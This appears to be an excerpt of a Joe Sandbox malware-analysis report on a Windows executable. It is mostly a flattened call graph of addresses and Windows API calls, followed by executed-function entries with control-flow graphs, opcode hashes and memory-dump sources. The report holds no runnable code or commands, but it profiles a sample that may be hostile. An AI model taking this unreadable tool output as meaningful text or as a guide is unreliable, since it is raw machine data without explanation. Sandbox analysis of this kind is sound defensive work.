HeapFree 7665->7666 7667 140012360 HeapFree 7665->7667 7666->7665 7667->7665 7668 14000bc0c 7669 14000bc19 EnableWindow 7668->7669 7670 14000bc2b 7668->7670 7669->7670 7671 140014810 7672 14001482a 7671->7672 7673 140014869 7671->7673 7672->7673 7674 14001483f memmove memmove 7672->7674 7674->7673 7675 140016410 malloc 8356 140012390 HeapFree HeapFree 7987 14000c490 7992 14000c6e0 7987->7992 7990 14000c4c6 7991 14000c4ab GetCurrentProcess TerminateProcess 7991->7990 7995 14000c4f0 7992->7995 7996 14000c510 7995->7996 7996->7996 7997 14000c562 RtlLookupFunctionEntry 7996->7997 7998 14000c5b4 RtlLookupFunctionEntry 7997->7998 8000 14000c5f3 7997->8000 7998->8000 8001 14000c499 7998->8001 7999 14000c61b RtlVirtualUnwind 7999->8000 7999->8001 8000->7999 8000->8001 8002 14000c664 RtlLookupFunctionEntry 8000->8002 8001->7990 8001->7991 8002->8000 8002->8001 8228 140002914 8229 140012360 HeapFree 8228->8229 8230 140002926 8229->8230 8003 140012e97 8004 140012ead 8003->8004 8006 140012ea0 8003->8006 8005 140014d80 3 API calls 8004->8005 8004->8006 8005->8006 7676 14000281c 7683 140012600 TlsGetValue 7676->7683 7678 140002821 7679 140012360 HeapFree 7678->7679 7680 140002835 7679->7680 7681 140012360 HeapFree 7680->7681 7682 140002847 7681->7682 7683->7678 7684 140016420 free 8231 140017120 8232 1400171ae malloc 8231->8232 8233 140017140 MultiByteToWideChar 8231->8233 8234 1400171bc 8232->8234 8233->8232 8236 14001716d malloc MultiByteToWideChar 8233->8236 8236->8234 8007 14000bea0 GetWindowThreadProcessId GetCurrentThreadId 8008 14000bf31 8007->8008 8009 14000bec1 IsWindowVisible 8007->8009 8009->8008 8010 14000bece 8009->8010 8011 140011cb0 HeapAlloc 8010->8011 8012 14000bedf GetCurrentThreadId GetWindowLongPtrW 8011->8012 8013 14000bf06 8012->8013 8014 14000bf0a GetForegroundWindow 8012->8014 8013->8014 8014->8008 8015 14000bf15 IsWindowEnabled 8014->8015 8015->8008 8016 14000bf22 EnableWindow 8015->8016 8016->8008 7685 140013021 7687 140013026 7685->7687 7686 140014d80 3 API calls 7689 140012f79 7686->7689 7688 1400132aa memmove 7687->7688 7687->7689 7690 1400132ba 7687->7690 7688->7690 7690->7686 7690->7689 8017 1400034a2 8030 140012600 TlsGetValue 8017->8030 8019 1400034a7 8020 140012360 HeapFree 8019->8020 8021 1400034bb 8020->8021 8022 140012360 HeapFree 8021->8022 8023 1400034cd 8022->8023 8024 140012360 HeapFree 8023->8024 8025 1400034df 8024->8025 8026 140012360 HeapFree 8025->8026 8027 1400034f1 8026->8027 8028 140012360 HeapFree 8027->8028 8029 140003503 8028->8029 8030->8019 7691 140011024 7692 140011032 TlsFree 7691->7692 7693 14001103e 7691->7693 7692->7693 7694 14000e824 7695 14000e8e4 7694->7695 7703 14000fee4 7695->7703 7704 14000ff0b 7703->7704 7705 14000ff92 7704->7705 7706 14000ff47 memmove 7704->7706 7710 14000ea48 7706->7710 7708 14000ea48 memmove 7709 14000ff70 7708->7709 7709->7705 7709->7708 7711 14000ea81 7710->7711 7712 14000ea71 memmove 7710->7712 7711->7709 7712->7711 8375 140010fa8 8376 140010fbe 8375->8376 8377 140010fdd HeapFree 8376->8377 8378 140010fef 8376->8378 8377->8378 8379 1400021a8 8380 1400021ab 8379->8380 8381 140012360 HeapFree 8380->8381 8382 1400021ba 8381->8382 8383 140012360 HeapFree 8382->8383 8384 1400021cc 8383->8384 8385 140012360 HeapFree 8384->8385 8386 1400021de 8385->8386 7713 14001162c 7718 14001147c 7713->7718 7716 140011646 memset 7717 140011659 7716->7717 7719 1400114a4 7718->7719 7720 14001149a EnterCriticalSection 7718->7720 7721 14001155e HeapAlloc 7719->7721 7725 1400114b1 7719->7725 7720->7719 7722 140011586 HeapAlloc 7721->7722 7721->7725 7722->7725 7723 140011606 7723->7716 7723->7717 7724 1400115fc LeaveCriticalSection 7724->7723 7725->7723 7725->7724 7726 14000b62c 7727 14000b635 HeapFree 7726->7727 7728 14000b647 7726->7728 7727->7728 8040 1400040ac 8041 1400123e0 21 API calls 8040->8041 8042 1400040ce 8041->8042 8043 14000d6a0 5 API calls 8042->8043 8044 1400040da 8043->8044 8053 1400121c0 GetLastError TlsGetValue SetLastError 8044->8053 8046 1400040e4 8054 1400121c0 GetLastError TlsGetValue SetLastError 8046->8054 8048 1400040f8 8055 14000ca00 8048->8055 8052 140004122 8053->8046 8054->8048 8056 14000ca20 8055->8056 8057 1400126d0 2 API calls 8056->8057 8058 14000ca34 8057->8058 8059 14000ca3b memmove 8058->8059 8060 14000410d 8058->8060 8059->8060 8061 140012210 TlsGetValue 8060->8061 8062 140012251 HeapAlloc 8061->8062 8063 140012276 HeapReAlloc 8061->8063 8064 1400122a1 8062->8064 8063->8064 8064->8052 8237 14000432e 8240 140012600 TlsGetValue 8237->8240 8239 140004333 8240->8239 7729 140011a30 InitializeCriticalSection 8065 1400136b0 8066 1400136bf 8065->8066 8067 140013750 memmove 8066->8067 8068 140014393 8066->8068 8070 14001378b 8066->8070 8067->8070 8069 140014d80 3 API calls 8068->8069 8068->8070 8069->8070 8241 140016f30 8242 140016f60 8241->8242 8242->8242 8243 140016f6b MultiByteToWideChar 8242->8243 8244 1400126d0 2 API calls 8243->8244 8245 140016f97 MultiByteToWideChar 8244->8245 7538 14000c6b0 7539 14000c6d1 7538->7539 7540 14000c6c0 RemoveVectoredExceptionHandler 7538->7540 7540->7539 7730 140007a30 7731 140007a50 9 API calls 7730->7731 7732 140007a49 7731->7732 7733 140008230 7734 140008260 12 API calls 7733->7734 7735 140008251 7734->7735 8071 140008eb5 8072 140008ee3 8071->8072 8073 140008ec9 8071->8073 8076 140008ed4 8072->8076 8087 14000afc0 8072->8087 8073->8076 8077 140009da0 8073->8077 8078 140009dc9 8077->8078 8080 140009e0d 8077->8080 8097 14000b510 8078->8097 8080->8080 8081 140009da0 _wcsicmp 8080->8081 8084 140009de0 8080->8084 8082 140009e66 8081->8082 8083 140009da0 _wcsicmp 8082->8083 8086 140009e79 8083->8086 8084->8076 8085 14000b510 _wcsicmp 8085->8086 8086->8084 8086->8085 8088 14000afe9 8087->8088 8090 14000b02d 8087->8090 8089 14000b510 _wcsicmp 8088->8089 8094 14000b000 8089->8094 8090->8090 8091 14000afc0 _wcsicmp 8090->8091 8090->8094 8092 14000b086 8091->8092 8093 14000afc0 _wcsicmp 8092->8093 8096 14000b099 8093->8096 8094->8076 8095 14000b510 _wcsicmp 8095->8096 8096->8094 8096->8095 8098 14000b524 8097->8098 8099 14000b515 8097->8099 8098->8084 8100 1400070cc _wcsicmp 8099->8100 8101 14000b51e 8099->8101 8100->8084 8100->8097 8101->8084 8246 140014535 8247 14001455a 8246->8247 8247->8247 8248 140014779 memmove 8247->8248 8249 1400145dc 8247->8249 8248->8249 7736 14000bc38 7737 14000bc84 7736->7737 7738 14000bc4c 7736->7738 7738->7737 7739 14000bc51 SendMessageW Sleep PostMessageW 7738->7739 7739->7737 7744 14000e83b HeapAlloc 7745 14000e87d 7744->7745 7746 14000303f 7757 140012600 TlsGetValue 7746->7757 7748 140003044 7749 140012360 HeapFree 7748->7749 7750 140003058 7749->7750 7751 140012360 HeapFree 7750->7751 7752 14000306a 7751->7752 7753 140012360 HeapFree 7752->7753 7754 14000307c 7753->7754 7755 140012360 HeapFree 7754->7755 7756 14000308e 7755->7756 7757->7748 7758 14000c040 7763 140011248 EnterCriticalSection 7758->7763 7761 14000c075 7762 14000c05d CloseHandle 7762->7761 7764 14001127a LeaveCriticalSection 7763->7764 7765 14001126c 7763->7765 7766 14000c058 7764->7766 7765->7764 7766->7761 7766->7762 8102 1400048c0 8111 140012600 TlsGetValue 8102->8111 8104 1400048c5 8105 140012360 HeapFree 8104->8105 8106 1400048d9 8105->8106 8107 140012360 HeapFree 8106->8107 8108 1400048eb 8107->8108 8109 140012360 HeapFree 8108->8109 8110 1400048fd 8109->8110 8111->8104 8250 14000e540 8251 140011248 2 API calls 8250->8251 8252 14000e55f 8251->8252 8253 14000b740 8256 14000b758 8253->8256 8296 14000b5d8 8256->8296 8258 14000b790 8259 14000b5d8 2 API calls 8258->8259 8260 14000b79b 8259->8260 8261 14000b5d8 2 API calls 8260->8261 8262 14000b7a6 8261->8262 8263 14000b7b2 GetStockObject 8262->8263 8264 14000b7c3 LoadIconW LoadCursorW RegisterClassExW 8262->8264 8263->8264 8265 14000be5c 3 API calls 8264->8265 8266 14000b83f 8265->8266 8267 14000bf44 7 API calls 8266->8267 8268 14000b84d 8267->8268 8269 14000b859 IsWindowEnabled 8268->8269 8270 14000b87a 8268->8270 8269->8270 8271 14000b863 EnableWindow 8269->8271 8272 14000be5c 3 API calls 8270->8272 8271->8270 8273 14000b886 GetSystemMetrics GetSystemMetrics CreateWindowExW 8272->8273 8274 14000b902 6 API calls 8273->8274 8275 14000bb96 8273->8275 8276 14000ba12 SendMessageW wcslen wcslen SendMessageW 8274->8276 8277 14000ba53 CreateWindowExW SendMessageW CreateAcceleratorTableW SetForegroundWindow BringWindowToTop 8274->8277 8278 14000bba4 8275->8278 8299 1400127b0 TlsGetValue 8275->8299 8276->8277 8281 14000bb48 8277->8281 8279 14000bba9 HeapFree 8278->8279 8280 14000bbbb 8278->8280 8279->8280 8283 14000bbd2 8280->8283 8284 14000bbc0 HeapFree 8280->8284 8285 14000bb51 8281->8285 8286 14000bb0a GetMessageW 8281->8286 8288 14000bbd7 HeapFree 8283->8288 8289 14000b751 8283->8289 8284->8283 8290 14000bb56 DestroyAcceleratorTable 8285->8290 8291 14000bb5f 8285->8291 8286->8285 8287 14000bb20 TranslateAcceleratorW 8286->8287 8287->8281 8292 14000bb34 TranslateMessage DispatchMessageW 8287->8292 8288->8289 8290->8291 8291->8275 8293 14000bb68 wcslen 8291->8293 8292->8281 8294 1400126d0 2 API calls 8293->8294 8295 14000bb77 wcscpy HeapFree 8294->8295 8295->8275 8297 14000b5ea wcslen HeapAlloc 8296->8297 8298 14000b60e 8296->8298 8297->8298 8298->8258 8299->8278 7767 14000c444 7768 14000c455 7767->7768 7769 14000c44d SetEnvironmentVariableW 7767->7769 7769->7768 8112 14000cec4 8113 14000cf4b 8112->8113 8114 14000cee9 8112->8114 8114->8113 8116 14000cf02 8114->8116 8120 14000d140 8114->8120 8116->8113 8119 140016538 5 API calls 8116->8119 8127 14000d1f0 8116->8127 8136 14000d02c 8116->8136 8119->8116 8121 14000d15b 8120->8121 8122 14000d1b4 memset 8121->8122 8123 14000d163 HeapFree 8121->8123 8125 1400168c0 HeapFree 8121->8125 8126 1400116f4 3 API calls 8121->8126 8124 14000d1d0 8122->8124 8123->8121 8124->8116 8125->8121 8126->8121 8128 14000d230 8127->8128 8130 14000d210 8127->8130 8129 14001147c 4 API calls 8128->8129 8135 14000d22e 8129->8135 8130->8128 8131 14000d21d 8130->8131 8133 1400168c0 HeapFree 8131->8133 8131->8135 8132 14000d295 8132->8116 8133->8135 8134 14000d281 memset 8134->8132 8135->8132 8135->8134 8137 14000d073 8136->8137 8138 14000d04c 8136->8138 8142 14000d08f 8137->8142 8157 14000d3a4 8137->8157 8151 14000cf74 8138->8151 8141 14000d051 8141->8137 8143 14000d059 8141->8143 8144 14001147c 4 API calls 8142->8144 8145 14000d06e 8143->8145 8149 1400168c0 HeapFree 8143->8149 8146 14000d0a6 8144->8146 8147 14000d11c 8145->8147 8148 14000d108 memset 8145->8148 8146->8147 8150 14000d0ae wcslen HeapAlloc wcscpy 8146->8150 8147->8116 8148->8147 8149->8145 8150->8145 8152 14000cfa2 8151->8152 8154 14000cfe2 8151->8154 8153 14000d3a4 tolower 8152->8153 8155 14000cfa7 8153->8155 8154->8155 8156 14000cff8 wcscmp 8154->8156 8155->8141 8156->8154 8156->8155 8158 14000d3c7 tolower 8157->8158 8159 14000d3b8 8158->8159 8160 14000d3d0 8158->8160 8159->8158 8160->8142 8300 140003144 8301 140003147 8300->8301 8302 140012360 HeapFree 8301->8302 8303 140003156 8302->8303 8304 140012360 HeapFree 8303->8304 8305 140003168 8304->8305 7770 140002648 7771 14000264f 7770->7771 7772 140012360 HeapFree 7771->7772 7773 140002666 7772->7773 7774 140012360 HeapFree 7773->7774 7775 140002678 7774->7775 7776 140012360 HeapFree 7775->7776 7777 14000268a 7776->7777 7778 140012360 HeapFree 7777->7778 7779 14000269c 7778->7779 7780 140012360 HeapFree 7779->7780 7781 1400026ae 7780->7781 8161 1400088c9 8162 1400088e0 8161->8162 8163 1400088fa 8161->8163 8164 140009da0 _wcsicmp 8162->8164 8166 1400088eb 8162->8166 8165 14000afc0 _wcsicmp 8163->8165 8163->8166 8164->8166 8165->8166 7782 14000b64c 7783 14000b667 7782->7783 7784 14000b70e UnregisterClassW 7782->7784 7785 14000b68b 7783->7785 7787 14000b674 DefWindowProcW 7783->7787 7788 14000b67f 7783->7788 7786 14000b72c 7784->7786 7785->7786 7789 14000b6ea EnableWindow 7785->7789 7790 14000b6fc 7785->7790 7787->7786 7788->7785 7791 14000b695 GetWindowLongPtrW GetWindowTextLengthW HeapAlloc GetWindowTextW 7788->7791 7789->7790 7794 14000bf44 7790->7794 7791->7785 7795 14000bf57 EnumWindows 7794->7795 7796 14000bfbb 7794->7796 7798 14000b703 DestroyWindow 7795->7798 7799 14000bf77 GetCurrentThreadId 7795->7799 7797 14000bfc7 GetCurrentThreadId 7796->7797 7796->7798 7801 14000bfdb EnableWindow 7796->7801 7803 14000bff0 SetWindowPos 7796->7803 7805 140011c68 7796->7805 7797->7796 7798->7786 7800 14000bf85 7799->7800 7800->7798 7800->7799 7802 14000bf8b SetWindowPos 7800->7802 7801->7796 7802->7800 7803->7796 7806 140011c74 HeapFree 7805->7806 7808 14001f820 7806->7808 8167 1400130cb 8169 1400130d0 8167->8169 8168 140014d80 3 API calls 8172 140013480 8168->8172 8170 1400132ba 8169->8170 8171 1400132aa memmove 8169->8171 8170->8168 8170->8172 8171->8170 8306 140002b4c 8307 1400123e0 21 API calls 8306->8307 8308 140002b6a 8307->8308 8391 140016fd0 8392 140017000 8391->8392 8392->8392 8393 14001700b MultiByteToWideChar malloc MultiByteToWideChar 8392->8393 7510 14000de50 7528 1400112a8 EnterCriticalSection 7510->7528 7512 14000de98 7513 14000deb6 7512->7513 7514 14000defb 7512->7514 7522 14000e04d 7512->7522 7515 14000dec9 7513->7515 7516 14000decd CreateFileW 7513->7516 7517 14000df42 7514->7517 7518 14000df00 7514->7518 7515->7516 7524 14000dfb7 7516->7524 7521 14000df5f CreateFileW 7517->7521 7517->7524 7519 14000df13 7518->7519 7520 14000df17 CreateFileW 7518->7520 7519->7520 7520->7524 7523 14000df8d CreateFileW 7521->7523 7521->7524 7523->7524 7524->7522 7525 14000dfe1 HeapAlloc 7524->7525 7526 14000dff9 7524->7526 7525->7526 7526->7522 7527 14000e036 SetFilePointer 7526->7527 7527->7522 7529 1400112e3 7528->7529 7530 1400112d0 7528->7530 7531 140011312 7529->7531 7532 1400112e9 HeapReAlloc 7529->7532 7533 140011cb0 HeapAlloc 7530->7533 7535 14001132d HeapAlloc 7531->7535 7537 14001131d 7531->7537 7532->7531 7534 1400112de 7533->7534 7536 140011352 LeaveCriticalSection 7534->7536 7535->7537 7536->7512 7537->7536 8173 1400086d0 8174 140008701 8173->8174 8175 1400086ee 8173->8175 8176 140008710 CharLowerW CharLowerW 8174->8176 8177 14000873e 8174->8177 8176->8174 8176->8177 7809 140002853 7830 1400123e0 7809->7830 7813 14000286b 7843 1400121c0 GetLastError TlsGetValue SetLastError 7813->7843 7815 140002889 7844 140012450 7815->7844 7817 140002898 7849 1400121c0 GetLastError TlsGetValue SetLastError 7817->7849 7819 1400028a6 7850 1400121c0 GetLastError TlsGetValue SetLastError 7819->7850 7821 1400028ba 7851 14000c8e0 7821->7851 7825 1400028d4 7856 1400125d0 TlsGetValue 7825->7856 7827 1400028e5 7857 14000b574 7827->7857 7829 1400028fb 7831 1400123ed 7830->7831 7832 14001240f TlsGetValue 7830->7832 7835 140012060 5 API calls 7831->7835 7833 140002861 7832->7833 7834 140012420 7832->7834 7842 1400121c0 GetLastError TlsGetValue SetLastError 7833->7842 7873 140012bf0 HeapAlloc HeapAlloc TlsSetValue 7834->7873 7836 1400123f2 TlsGetValue 7835->7836 7864 140016cc4 7836->7864 7839 140012425 TlsGetValue 7841 140016cc4 13 API calls 7839->7841 7841->7833 7842->7813 7843->7815 7845 140012477 7844->7845 7846 140012469 wcslen 7844->7846 7847 1400126d0 2 API calls 7845->7847 7846->7845 7848 140012485 7847->7848 7848->7817 7849->7819 7850->7821 7852 14000c8f0 7851->7852 7853 1400126d0 2 API calls 7852->7853 7854 1400028ca 7853->7854 7855 140012520 TlsGetValue 7854->7855 7855->7825 7856->7827 7874 14000be5c GetForegroundWindow 7857->7874 7860 14000bf44 7 API calls 7861 14000b5a3 MessageBoxW 7860->7861 7862 14000bf44 7 API calls 7861->7862 7863 14000b5bf 7862->7863 7863->7829 7865 140016cf2 TlsAlloc InitializeCriticalSection 7864->7865 7866 140016d11 TlsGetValue 7864->7866 7865->7866 7867 140016de6 HeapAlloc 7866->7867 7868 140016d29 HeapAlloc 7866->7868 7869 14001240d 7867->7869 7868->7869 7870 140016d49 EnterCriticalSection 7868->7870 7869->7833 7871 140016d61 7 API calls 7870->7871 7872 140016d5e 7870->7872 7871->7867 7872->7871 7873->7839 7875 14000b596 7874->7875 7876 14000be76 GetWindowThreadProcessId GetCurrentProcessId 7874->7876 7875->7860 7876->7875 8394 1400031d9 8395 1400031dc 8394->8395 8396 140012360 HeapFree 8395->8396 8397 1400031eb 8396->8397 8398 14000c3dc GetEnvironmentVariableW 8399 14000c408 8398->8399 8400 1400126d0 2 API calls 8399->8400 8401 14000c413 GetEnvironmentVariableW 8400->8401 8178 1400076e0 8179 14000773d 8178->8179 8181 1400076f1 8178->8181 8180 140007729 wcsstr 8180->8179 8181->8179 8181->8180 8315 140007760 8316 1400077e7 8315->8316 8317 140007769 8315->8317 8317->8316 8318 1400077b9 8317->8318 8319 1400077c0 wcsstr 8317->8319 8322 1400085f0 8318->8322 8321 1400077be 8319->8321 8323 14000869f 8322->8323 8324 140008617 CharLowerW 8322->8324 8323->8321 8325 140008630 8324->8325 8325->8323 8325->8325 8326 14000864c CharLowerW 8325->8326 8327 140008670 CharLowerW CharLowerW 8325->8327 8326->8325 8327->8325

                                                              Executed Functions

                                                              Function 000000014000D9C4 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 46libraryloaderCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.1814906077.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000012.00000002.1814875575.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814939105.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814978834.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1815015404.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: LibraryPath$AddressAllocFreeHeapLoadLongNameProcTempValue
                                                              • String ID: GetLongPathNameW$Kernel32.DLL
                                                              • API String ID: 820969696-2943376620
                                                              • Opcode ID: 7b5facb765f8cdd7be91ebb16a2403b7b75564631065215e584da20e470a0f22
                                                              • Instruction ID: 08c74a34c6d82e646fe97c561cc400b119dc1938ee8d5d8dcc972cb306c03a44
                                                              • Opcode Fuzzy Hash: 7b5facb765f8cdd7be91ebb16a2403b7b75564631065215e584da20e470a0f22
                                                              • Instruction Fuzzy Hash: 17116D31721B4086EF159F27A9843A967A1FB8CFC0F481029EF4E4B7A5DE39C8528340
                                                              Function 0000000140001E57 Relevance: 9.3, APIs: 6, Instructions: 259COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.1814906077.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000012.00000002.1814875575.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814939105.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814978834.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1815015404.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: File$NameTemp$Heap$AllocErrorLastPathValue$AttributesBackslashCreateDeleteDirectoryExtensionFreeRenamememmovewcslenwcsncpy
                                                              • String ID:
                                                              • API String ID: 4232179356-0
                                                              • Opcode ID: f37d14f45d1a2abd6f91fd25c4a0b9dbf2c58692b7ebd1d65ebe457cd595aad6
                                                              • Instruction ID: 2ef6d83f5e2b3c8fb19d65fceeff62dc40447b47a2c1a218917e14d6a90cbc88
                                                              • Opcode Fuzzy Hash: f37d14f45d1a2abd6f91fd25c4a0b9dbf2c58692b7ebd1d65ebe457cd595aad6
                                                              • Instruction Fuzzy Hash: E38162FBE69644E5EA07B763BC86BED5220D3AD3D4F504410FF08062A3EE3995E64B10
                                                              Function 000000014000DE50 Relevance: 9.2, APIs: 6, Instructions: 151filememoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 94 14000de50-14000de9e call 1400112a8 97 14000dea4-14000deb4 94->97 98 14000e098-14000e09b 94->98 100 14000deb6-14000dec7 97->100 101 14000defb-14000defe 97->101 99 14000e07f-14000e097 98->99 102 14000dec9 100->102 103 14000decd-14000def6 CreateFileW 100->103 104 14000df42-14000df46 101->104 105 14000df00-14000df11 101->105 102->103 106 14000dfbc-14000dfc0 103->106 109 14000dfb7 104->109 110 14000df48-14000df59 104->110 107 14000df13 105->107 108 14000df17-14000df40 CreateFileW 105->108 113 14000dfc6-14000dfc9 106->113 114 14000e05d-14000e06f call 1400111dc 106->114 107->108 108->106 109->106 111 14000df5b 110->111 112 14000df5f-14000df8b CreateFileW 110->112 111->112 112->113 115 14000df8d-14000dfb5 CreateFileW 112->115 113->114 116 14000dfcf-14000dfd8 113->116 118 14000e074-14000e07c 114->118 115->106 119 14000dff9 116->119 120 14000dfda-14000dfdf 116->120 118->99 122 14000dffd-14000e02d 119->122 120->119 121 14000dfe1-14000dff7 HeapAlloc 120->121 121->122 123 14000e04d-14000e05b 122->123 124 14000e02f-14000e034 122->124 123->114 123->118 124->123 125 14000e036-14000e047 SetFilePointer 124->125 125->123
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.1814906077.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000012.00000002.1814875575.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814939105.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814978834.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1815015404.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: File$Create$CriticalSection$AllocEnterHeapLeavePointer
                                                              • String ID:
                                                              • API String ID: 2685021396-0
                                                              • Opcode ID: bf349e5ae30ca8a1459a9c900c950eddfabbaec973a548aea2fdccc3e75a92be
                                                              • Instruction ID: 9fd7d13fb8664e67d48ce56ae15862c74b29b4b7423edb5d501112f331116329
                                                              • Opcode Fuzzy Hash: bf349e5ae30ca8a1459a9c900c950eddfabbaec973a548aea2fdccc3e75a92be
                                                              • Instruction Fuzzy Hash: 2B51D4B261469086E761CF17F9007AA7690B39CBE4F04873AFF6A47BE4DB79C4419B10
                                                              Function 000000014000593C Relevance: 7.0, APIs: 4, Instructions: 980COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 126 14000593c-14000593e 127 140005945-140005954 126->127 127->127 128 140005956-140005979 call 1400123e0 127->128 131 14000597b-140005987 128->131 132 140005a39-140005a53 131->132 133 14000598d-140005a33 call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 131->133 135 140005a55-140005a61 132->135 133->131 133->132 137 140005b13-140005b2d 135->137 138 140005a67-140005b0d call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 135->138 141 140005b2f-140005b3b 137->141 138->135 138->137 144 140005b41-140005be7 call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 141->144 145 140005bed-140005c07 141->145 144->141 144->145 149 140005c09-140005c15 145->149 153 140005cc7-140005ce1 149->153 154 140005c1b-140005cc1 call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 149->154 159 140005ce3-140005cef 153->159 154->149 154->153 160 140005da1-140005dbb 159->160 161 140005cf5-140005d91 call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 159->161 168 140005dbd-140005dc9 160->168 284 140005d96-140005d9b 161->284 175 140005e7f-140005e99 168->175 176 140005dcf-140005e79 call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 168->176 184 140005e9b-140005ea7 175->184 176->168 176->175 192 140005f5d-140005f77 184->192 193 140005ead-140005f57 call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 184->193 201 140005f79-140005f85 192->201 193->184 193->192 209 14000603b-140006055 201->209 210 140005f8b-140006035 call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 201->210 219 140006057-140006063 209->219 210->201 210->209 228 140006119-14000657b call 1400121c0 call 140012450 * 2 call 140012210 call 1400121c0 * 2 call 1400047e2 call 140012210 call 14000c2bc GetModuleHandleW call 1400121c0 * 4 call 140010ba0 call 1400125d0 call 140007dc0 call 140012210 call 1400121c0 * 4 call 140010ba0 call 1400125d0 call 140007dc0 call 140012210 call 140004134 call 1400121c0 * 2 call 140002c46 call 140006a58 call 140001e57 call 1400067aa call 1400121c0 * 2 call 14000ca70 call 1400049ea call 140012210 PathRemoveBackslashW call 140002bab call 1400121c0 * 3 call 140003cc9 call 140012520 call 1400125d0 call 14000c45c call 140006a58 call 1400121c0 call 140012450 * 2 call 140012210 call 1400121c0 * 2 call 1400026bb call 140012210 call 140004ee2 call 1400121c0 call 140012450 call 140012210 PathQuoteSpacesW call 1400121c0 call 140012450 * 3 call 140012210 PathQuoteSpacesW 219->228 229 140006069-140006113 call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 219->229 428 1400065a1-1400065a6 call 140003ddc 228->428 429 14000657d-14000659f call 140007284 228->429 229->219 229->228 284->159 284->160 432 1400065ab-1400067a9 call 1400121c0 * 2 call 140012450 * 3 call 140012520 call 1400121c0 * 2 call 14000daa8 call 140012520 call 1400121c0 call 140012450 * 2 call 1400125d0 * 3 call 1400029c8 call 140006a58 call 140002930 call 140012360 * 10 428->432 429->432
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.1814906077.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000012.00000002.1814875575.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814939105.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814978834.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1815015404.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: Value$HeapPath$AllocCriticalErrorLastQuoteSectionSpaces$BackslashCharCreateEnterEnvironmentFileFreeHandleLeaveModuleNameRemoveTempThreadUpperVariablewcslen
                                                              • String ID:
                                                              • API String ID: 2499486723-0
                                                              • Opcode ID: 01fd8b8b98fab0c980f96e61b2251792a09e9ddd7d05bec7d734751dcc1b6e06
                                                              • Instruction ID: 5e2f233be3bb1e1a489454234068146e28d45b36aeb09ace1181e30b51997f55
                                                              • Opcode Fuzzy Hash: 01fd8b8b98fab0c980f96e61b2251792a09e9ddd7d05bec7d734751dcc1b6e06
                                                              • Instruction Fuzzy Hash: 6C722BB6E25548D6EA16B7B7B8877E95220A3AD394F500411FF4C0B363EE39C5F64B10
                                                              Function 000000014000E620 Relevance: 6.1, APIs: 4, Instructions: 119COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.1814906077.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000012.00000002.1814875575.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
